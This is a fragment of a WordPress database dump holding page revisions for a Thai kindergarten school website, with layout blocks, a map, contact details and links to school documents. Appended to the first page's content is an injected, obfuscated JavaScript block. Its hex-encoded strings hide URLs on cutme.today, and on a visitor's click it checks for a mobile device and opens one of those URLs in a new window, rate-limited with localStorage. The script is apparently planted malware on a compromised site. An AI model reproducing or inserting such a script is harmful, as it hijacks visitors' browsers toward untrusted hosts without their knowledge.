{\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:42:37','2024-08-30 02:42:37','',19,'http://watprato.ssk.in.th/?p=282',0,'revision','',0),
(283,2,'2024-08-30 09:44:07','2024-08-30 02:44:07','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" 